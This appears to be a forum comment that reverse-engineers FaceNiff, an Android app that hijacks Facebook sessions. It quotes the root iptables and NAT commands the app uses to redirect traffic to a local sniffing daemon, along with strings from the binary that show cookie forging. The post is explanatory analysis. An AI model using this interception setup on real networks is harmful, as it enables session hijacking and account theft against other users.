| I was curious about the technique used under the hood, so I decided to have a closer look. -- What it does to intercept network trafic: 1/ The app spawns an android (java) service that, that performs the following as root when it starts: # echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE # iptables -t nat -I OUTPUT -j DNAT -p tcp --dport 1337 --to 127.0.0.1 # iptables -t nat -I PREROUTING -j DNAT -p tcp --dport 1337 --to xxxunclearherexxx My understanding is that it redirects outgoing packets (targetted at port 1337) to loopback, where the native daemon listens (2/) This is not visible in the video, but when the user clicks to use a caught Facebook profile, it seems to trigger an android Intent to actually go to Facebook on port 1337 instead of 80, so it gets caught by the iptables hook. 2/ It then execs the faceniff binary to go native (unpacked from resources) with some params (stealth/passive mode, license check), and polls its status every 1s. -- Native part:
I believe it handles most of the logic. Looking at the strings contained, it seems to deal with libpcap to intercept and forge headers on the fly. Some interesting strings:
libpcap version 0.9.8 new user found but the app is locked! Unable to find ssid in cookies [%s] HTTP/1.1 200 OK Content-Type: text/html Connection: close Set-Cookie: %s=%s; expires=Fri, 14-Jul-2017 04:40:00 GMT; path=/; domain=.%s <meta http-equiv='refresh' content='0;http://%s/>; HTTP/1.1 200 OK Content-Type: text/html Connection: close Date: Wed, 02 Feb 2011 01:51:18 GMT <li><a href='http://%s:1337/%s>%s</a></li>; client asking for: [%s] Technically speaking, this is interesting. Please feel free to add info if you are familiar with the technique. |